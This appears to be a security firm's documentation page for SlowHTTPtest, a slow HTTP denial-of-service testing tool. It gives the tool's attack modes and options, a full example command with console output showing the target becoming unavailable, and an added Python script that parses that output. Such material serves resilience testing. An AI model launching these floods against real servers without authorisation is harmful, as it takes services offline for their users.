SlowHTTPtest

Description

SlowHTTPtest – A tool to test for slow HTTP DoS vulnerabilities

Usage

Syntax

slowhttptest [options …]

Options

Test modes:
-H               slow headers a.k.a. Slowloris (default)
-B               slow body a.k.a R-U-Dead-Yet
-R               range attack a.k.a Apache killer
-X               slow read a.k.a Slow Read
Reporting options:
-g               generate statistics with socket state changes (off)
-o file_prefix   save statistics output in file.html and file.csv (-g required)
-v level         verbosity level 0-4: Fatal, Info, Error, Warning, Debug
General options:
-c connections   target number of connections (50)
-i seconds       interval between followup data in seconds (10)
-l seconds       target test length in seconds (240)
-r rate          connections per seconds (50)
-s bytes         value of Content-Length header if needed (4096)
-t verb          verb to use in request, default to GET for slow headers and response and to POST for slow body
-u URL           absolute URL of target (http://localhost/)
-x bytes         max length of each randomized name/value pair of followup data per tick, e.g. -x 2 generates X-xx: xx for header or &xx=xx for body, where x is random character (32)
Probe/Proxy options:
-d host:port     all traffic directed through HTTP proxy at host:port (off)
-e host:port     probe traffic directed through HTTP proxy at host:port (off)
-p seconds       timeout to wait for HTTP response on probe connection, after which server is considered inaccessible (5)
Range attack specific options:
-a start        left boundary of range in range header (5)
-b bytes        limit for range header right boundary values (2000)
Slow read specific options:
-k num          number of times to repeat same request in the connection. Use to multiply response size if server supports persistent connections (1)
-n seconds      interval between read operations from recv buffer in seconds (1)
-w bytes        start of the range advertised window size would be picked from (1)
-y bytes        end of the range advertised window size would be picked from (512)
-z bytes        bytes to slow read from receive buffer with single read() call (5)

Example

cyborg@cyborg:~$ slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://ztrela.com/ -p 5 -l 350 -e x.x.x.x:8080 -g 
Tue Sep 15 16:41:35 2015:
Tue Sep 15 16:41:35 2015:
    slowhttptest version 1.6
 - https://code.google.com/p/slowhttptest/ -
test type:                       SLOW READ
number of connections:           1000
URL:                             http://ztrela.com/
verb:                            GET
receive window range:            10 - 20
pipeline factor:                 1
read rate from receive buffer:   32 bytes / 5 sec
connections per seconds:         1000
probe connection timeout:        5 seconds
test duration:                   350 seconds
using proxy:                     probe proxy at x.x.x.x:8080

Tue Sep 15 16:41:35 2015:
slow HTTP test status on 0th second:

initializing:        0
pending:             1
connected:           0
error:               0
closed:              0
service available:   YES
Tue Sep 15 16:41:40 2015:
Tue Sep 15 16:41:40 2015:
    slowhttptest version 1.6
 - https://code.google.com/p/slowhttptest/ -
test type:                       SLOW READ
number of connections:           1000
URL:                             http://ztrela.com/
verb:                            GET
receive window range:            10 - 20
pipeline factor:                 1
read rate from receive buffer:   32 bytes / 5 sec
connections per seconds:         1000
probe connection timeout:        5 seconds
test duration:                   350 seconds
using proxy:                     probe proxy at x.x.x.x:8080

Tue Sep 15 16:41:40 2015:
slow HTTP test status on 5th second:

initializing:        0
pending:             602
connected:           398
error:               0
closed:              0
service available:   YES
Tue Sep 15 16:41:45 2015:
Tue Sep 15 16:41:45 2015:
    slowhttptest version 1.6
 - https://code.google.com/p/slowhttptest/ -
test type:                       SLOW READ
number of connections:           1000
URL:                             http://ztrela.com/
verb:                            GET
receive window range:            10 - 20
pipeline factor:                 1
read rate from receive buffer:   32 bytes / 5 sec
connections per seconds:         1000
probe connection timeout:        5 seconds
test duration:                   350 seconds
using proxy:                     probe proxy at x.x.x.x:8080

Tue Sep 15 16:41:45 2015:
slow HTTP test status on 10th second:

initializing:        0
pending:             586
connected:           414
error:               0
closed:              0
service available:   NO
^CTue Sep 15 16:41:48 2015:
Test ended on 12th second
Exit status: Cancelled by user
CSV report saved to slow_164120150915.csv
HTML report saved to slow_164120150915.html
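
When a run like the one above is captured during an authorized load test, the point of interest is the first status tick at which the probe reports "service available: NO" and how many sockets were connected at that moment. The following Python sketch is an added example, not part of slowhttptest or of the original page; the function names are hypothetical and the sample input is constructed from the values in the console output above.

```python
import re

# Constructed sample: the three status blocks from the run above, rebuilt
# from a template (timestamps and the repeated settings header are omitted).
_BLOCK = ("slow HTTP test status on {sec}th second:\n\n"
          "initializing:        0\npending:             {pend}\n"
          "connected:           {conn}\nerror:               0\n"
          "closed:              0\nservice available:   {avail}\n")
SAMPLE_OUTPUT = "".join(
    _BLOCK.format(sec=s, pend=p, conn=c, avail=a)
    for s, p, c, a in [(0, 1, 0, "YES"), (5, 602, 398, "YES"), (10, 586, 414, "NO")]
)

STATUS_RE = re.compile(r"slow HTTP test status on (\d+)\w* second:")
FIELD_RE = re.compile(
    r"^(initializing|pending|connected|error|closed|service available):\s+(\S+)$"
)

def parse_status_blocks(text):
    """Return one dict per status tick; settings-header lines are ignored."""
    blocks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        tick = STATUS_RE.search(line)
        if tick:
            current = {"second": int(tick.group(1))}
            blocks.append(current)
            continue
        field = FIELD_RE.match(line)
        if field and current is not None:
            key, value = field.groups()
            # The probe result is YES/NO; every other field is a socket count.
            current[key] = (value == "YES") if key == "service available" else int(value)
    return blocks

def first_unavailable(blocks):
    """Return the first tick where the probe connection failed, or None."""
    for block in blocks:
        if block.get("service available") is False:
            return block
    return None

if __name__ == "__main__":
    hit = first_unavailable(parse_status_blocks(SAMPLE_OUTPUT))
    if hit:
        print("probe failed at %ds with %d connected, %d pending"
              % (hit["second"], hit["connected"], hit["pending"]))
```

The connected count at the first failed probe gives a rough figure to compare against the server's configured connection or worker limit when tuning timeouts.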


Results generated in the HTML file (using -g): [image not preserved]
©2017 Ztrela Knowledge Solutions Pvt. Ltd